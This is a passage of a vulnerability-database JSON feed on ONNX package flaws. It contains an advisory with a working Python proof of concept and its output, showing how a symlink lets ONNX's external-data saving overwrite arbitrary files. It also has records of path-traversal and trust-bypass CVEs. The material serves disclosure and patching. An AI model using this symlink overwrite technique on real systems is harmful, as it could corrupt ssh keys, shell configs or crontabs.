By combining these, the attack is possible as shown below in the PoC section.\n\n#### Bypass\nThere is also a potential validation bypass on Windows systems in the same method (https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L203) alloing absolute paths like `C:\\` (only 1 part):\n```python\nif location_path.is_absolute() and len(location_path.parts) > 1\n```\nThis may allow Windows Path Traversals (not 100% verified as I am emulating things on a Debian distro).\n\n### PoC\n\nInstall the dependencies and run this:\n```python\nmport os\nimport sys\nimport tempfile\nimport numpy as np\nimport onnx\nfrom onnx import TensorProto, helper\nfrom onnx.numpy_helper import from_array\n\n# Create a temporary directory for our poc\nwith tempfile.TemporaryDirectory() as tmpdir:\n    print(f\"[*] Working directory: {tmpdir}\")\n\n    # Create a \"sensitive\" file that we'll overwrite\n    sensitive_file = os.path.join(tmpdir, \"sensitive.txt\")\n    with open(sensitive_file, 'w') as f:\n        f.write(\"SENSITIVE DATA - DO NOT OVERWRITE\")\n\n    original_content = open(sensitive_file, 'rb').read()\n    print(f\"[*] Created sensitive file: {sensitive_file}\")\n    print(f\"    Original content: {original_content}\")\n\n    # Create a simple ONNX model with a large tensor\n    print(\"[*] Creating ONNX model with external data...\")\n\n    # Create a tensor with data > 1KB (to trigger external data)\n    large_array = np.ones((100, 100), dtype=np.float32)  # 40KB tensor\n    large_tensor = from_array(large_array, name='large_weight')\n\n    # Create a minimal model\n    model = helper.make_model(\n        helper.make_graph(\n            [helper.make_node('Identity', ['input'], ['output'])],\n            'minimal_model',\n            [helper.make_tensor_value_info('input', TensorProto.FLOAT, [100, 100])],\n            [helper.make_tensor_value_info('output', TensorProto.FLOAT, [100, 100])],\n            [large_tensor]\n        )\n    )\n\n    # Save model with 
external data to create the external data file\n    model_path = os.path.join(tmpdir, \"model.onnx\")\n    external_data_name = \"data.bin\"\n    external_data_path = os.path.join(tmpdir, external_data_name)\n\n    onnx.save_model(\n        model, \n        model_path,\n        save_as_external_data=True,\n        all_tensors_to_one_file=True,\n        location=external_data_name,\n        size_threshold=1024\n    )\n\n    print(f\"[+] Model saved: {model_path}\")\n    print(f\"[+] External data created: {external_data_path}\")\n\n    # Now comes the attack: replace the external data file with a symlink\n    print(\"[!] ATTACK: Replacing external data file with symlink...\")\n\n    # Remove the legitimate external data file\n    if os.path.exists(external_data_path):\n        os.remove(external_data_path)\n        print(f\"    Removed: {external_data_path}\")\n\n    # Create symlink pointing to sensitive file\n    os.symlink(sensitive_file, external_data_path)\n    print(f\"    Created symlink: {external_data_path} -> {sensitive_file}\")\n\n    # Now load and re-save the model, which will trigger the vulnerability\n    print(\"Loading model and saving with external data...\")\n    try:\n        # Load the model (without loading external data)\n        loaded_model = onnx.load(model_path, load_external_data=False)\n\n        # Modify the model slightly (to ensure we write new data)\n        loaded_model.graph.initializer[0].raw_data = large_array.tobytes()\n\n        # Save again - this will call save_external_data() and follow the symlink\n        onnx.save_model(\n            loaded_model,\n            model_path,\n            save_as_external_data=True,\n            all_tensors_to_one_file=True,\n            location=external_data_name,\n            size_threshold=1024\n        )\n    except Exception as e:\n        print(f\"[-] Error: {e}\")\n    \n    # Check if the sensitive file was overwritten\n    print(\"[*] Checking if sensitive file was modified...\")\n  
  modified_content = open(sensitive_file, 'rb').read()\n    \n    print(f\"    Original size: {len(original_content)} bytes\")\n    print(f\"    Current size:  {len(modified_content)} bytes\")\n    print(f\"    Original content: {original_content[:50]}\")\n    print(f\"    Current content:  {modified_content[:50]}...\")\n    print()\n    \n    if modified_content != original_content:\n        print(\"[!] Success!\")\n    else:\n        print(\"[-] Failure\")\n```\nOutput:\n```\n[*] Working directory: /tmp/tmpqy7z88_l\n[*] Created sensitive file: /tmp/tmpqy7z88_l/sensitive.txt\n    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n\n[*] Creating ONNX model with external data...\n[+] Model saved: /tmp/tmpqy7z88_l/model.onnx\n[+] External data created: /tmp/tmpqy7z88_l/data.bin\n[!] ATTACK: Replacing external data file with symlink...\n    Removed: /tmp/tmpqy7z88_l/data.bin\n    Created symlink: /tmp/tmpqy7z88_l/data.bin -> /tmp/tmpqy7z88_l/sensitive.txt\nLoading model and saving with external data...\n[*] Checking if sensitive file was modified...\n    Original size: 33 bytes\n    Current size:  40033 bytes\n    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'\n    Current content:  b'SENSITIVE DATA - DO NOT OVERWRITE\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00\\x00\\x80?\\x00'...\n```\nThe \"sensitive data\" file is successfully overwritten.\n\n### Impact\nThe impact may include filesystem injections (e.g. on ssh keys, shell configs, crons) or destruction of files, affecting integrity and availability.\n\n### Mitigations\n1. Atomic file creation\n2. Symlink protection\n3. 
Path canonicalization","references":[{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6"},{"reference_url":"https://github.com/advisories/GHSA-q56x-g2fj-4rj6","reference_id":"GHSA-q56x-g2fj-4rj6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q56x-g2fj-4rj6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["GHSA-q56x-g2fj-4rj6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rs2r-qmck-4qgh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37096?format=json","vulnerability_id":"VCID-seht-766r-kke7","summary":"Path Traversal vulnerability in onnx.external_data_helper.save_external_data in ONNX 1.17.0 allows attackers to overwrite arbitrary files by supplying crafted external_data.location paths containing traversal sequences, bypassing intended directory 
restrictions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5187","reference_id":"","reference_type":"","scores":[{"value":"0.0261","scoring_system":"epss","scoring_elements":"0.85946","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0261","scoring_system":"epss","scoring_elements":"0.85933","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0261","scoring_system":"epss","scoring_elements":"0.85948","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0261","scoring_system":"epss","scoring_elements":"0.85945","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5187"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-51480","reference_id":"","reference_type":"","scores":[{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.58958","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.5895","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.58949","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.58934","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00366","scoring_system":"epss","scoring_elements":"0.58952","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-51480"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/advisories/GHSA-6rq9-53c3-f7vj","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_ele
ments":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://github.com/advisories/GHSA-6rq9-53c3-f7vj"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f"},{"reference_url":"https://github.com/onnx/onnx/commit/3fc3845edb048df559aa2a839e39e95503a0ee34","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/commit/3fc3845edb048df559aa2a839e39e95503a0ee34"},{"reference_url":"https://github.com/onnx/onnx/issues/6215","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scori
ng_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/issues/6215"},{"reference_url":"https://github.com/onnx/onnx/pull/6145","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/pull/6145"},{"reference_url":"https://github.com/onnx/onnx/pull/6222","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/pull/6222"},{"reference_url":"https://github.com/onnx/onnx/pull/6959","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://github.com/onnx/onnx/pull/6959"},{"reference_url":"https://github.com/onnx/onnx/pull/7040","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://github.com/onnx/onnx/pull/7040"},{"reference_url":"https://github.com/onnx/onnx/releases/tag/v1.16.2","reference
_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/releases/tag/v1.16.2"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-148.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-148.yaml"},{"reference_url":"https://huntr.com/bounties/50235ebd-3410-4ada-b064-1a648e11237e","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-07T18:47:07Z/"}],"url":"https://huntr.com/bounties/50235ebd-3410-4ada-b064-1a648e11237e"},{"reference_url":"https://www.gecko.security/blog/cve-2025-51480","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-07-22T17:45:49Z/"}],"url":"https://www.gecko.security/blog/cve-2025-51480"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1075852","reference
_id":"1075852","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1075852"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5187","reference_id":"CVE-2024-5187","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5187"},{"reference_url":"https://usn.ubuntu.com/8307-1/","reference_id":"USN-8307-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/8307-1/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/44709?format=json","purl":"pkg:pypi/onnx@1.16.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.2"}],"aliases":["CVE-2024-5187","CVE-2025-51480","GHSA-6rq9-53c3-f7vj","PYSEC-2025-148"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-seht-766r-kke7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37245?format=json","vulnerability_id":"VCID-u796-p1fa-ubf5","summary":"Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. In versions up to and including 1.20.1, a security control bypass exists in onnx.hub.load() due to improper logic in the repository trust verification mechanism. While the function is designed to warn users when loading models from non-official sources, the use of the silent=True parameter completely suppresses all security warnings and confirmation prompts. 
This vulnerability transforms a standard model-loading function into a vector for Zero-Interaction Supply-Chain Attacks. When chained with file-system vulnerabilities, an attacker can silently exfiltrate sensitive files (SSH keys, cloud credentials) from the victim's machine the moment the model is loaded. As of time of publication, no known patched versions are available.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28500.json","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28500.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28500","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01539","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01536","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01547","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01546","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28500"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28500","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28500"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m","reference_id":"","reference_type":"",
"scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T14:08:46Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-103.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-103.yaml"},{"reference_url":"https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-18T14:08:46Z/"}],"url":"https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28500","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28500"},{"reference_url"
:"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131209","reference_id":"1131209","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131209"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2448518","reference_id":"2448518","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2448518"},{"reference_url":"https://github.com/advisories/GHSA-hqmj-h5c6-369m","reference_id":"GHSA-hqmj-h5c6-369m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hqmj-h5c6-369m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/48828?format=json","purl":"pkg:pypi/onnx@1.21.0rc1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0rc1"},{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-28500","GHSA-hqmj-h5c6-369m","PYSEC-2026-103"],"risk_score":4.1,"exploitability":"0.5","weighted_severity":"8.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u796-p1fa-ubf5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/37001?format=json","vulnerability_id":"VCID-vufm-7t73-xfgt","summary":"A vulnerability in the `download_model` function of the onnx/onnx framework, before and including version 1.16.1, allows for arbitrary file overwrite due to inadequate prevention of path traversal attacks in malicious tar files. 
This vulnerability can be exploited by an attacker to overwrite files in the user's directory, potentially leading to remote command execution.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-7776","reference_id":"","reference_type":"","scores":[{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.90172","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.90183","published_at":"2026-06-09T12:55:00Z"},{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.90168","published_at":"2026-06-08T12:55:00Z"},{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.9017","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0526","scoring_system":"epss","scoring_elements":"0.90171","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-7776"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7776","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7776"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f"},{"reference_url":"https://github.com/onnx/onnx/pull/6222","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3
.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx/pull/6222"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-10.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-10.yaml"},{"reference_url":"https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222e83f63","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-03-20T15:51:57Z/"}],"url":"https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222e83f63"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-7776","reference_id":"CVE-2024-7776","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-7776"},{"reference_url":"https://github.com/advisories/GHSA-h36j-8vv3-cj52","reference_id":"GHSA-h36j-8vv3-cj52","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h36j-8vv3-cj52"}],"fixed_packages":[{"url":"http://public2.vulnera
blecode.io/api/packages/44709?format=json","purl":"pkg:pypi/onnx@1.16.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.16.2"},{"url":"http://public2.vulnerablecode.io/api/packages/48818?format=json","purl":"pkg:pypi/onnx@1.17.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.17.0"}],"aliases":["CVE-2024-7776","GHSA-h36j-8vv3-cj52","PYSEC-2025-10"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vufm-7t73-xfgt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/36361?format=json","vulnerability_id":"VCID-vv5a-aqzk-kker","summary":"Versions of the package onnx before 1.13.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is 